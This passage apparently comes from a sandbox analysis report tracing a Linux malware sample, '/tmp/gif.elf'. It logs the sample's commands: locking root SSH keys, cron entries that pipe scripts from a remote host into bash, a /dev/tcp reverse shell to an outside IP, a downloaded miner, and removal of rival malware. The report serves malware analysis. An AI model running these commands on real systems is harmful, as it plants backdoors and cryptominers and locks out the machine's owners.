      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys2
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      File Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys2
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /etc/cron.d
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/crontab
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /var/spool/cron
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /var/spool/cron/crontabs
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /etc/cron.hourly
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /etc/cron.d/watch
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chmod 755 /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chmod
      Arguments:chmod 755 /etc/cron.hourly/prelink
      File size:63864 bytes
      MD5 hash:739483b900c045ae1374d6f53a86a279

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /etc/cron.hourly/prelink
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys2
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys2
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/curl
      Arguments:curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
      File size:239848 bytes
      MD5 hash:add6bc2195e82c55985ccf49fd4048e6

      File Activities

      System Activities

      Network Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /tmp/python
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia chattr -ia /usr/bin/bsd-port/getty
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/.sshd
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/rc.d/init.d/selinux
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/rc.d/init.d/DbSecuritySp
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/sh.sh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/cron.hourly/cron.sh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /lib/udev/udev /lib/udev/debug
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/xrig
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/killall
      Arguments:killall .sshd xrig getty
      File size:32024 bytes
      MD5 hash:cd2adedbee501869ac691b88af39cd8b

      File Activities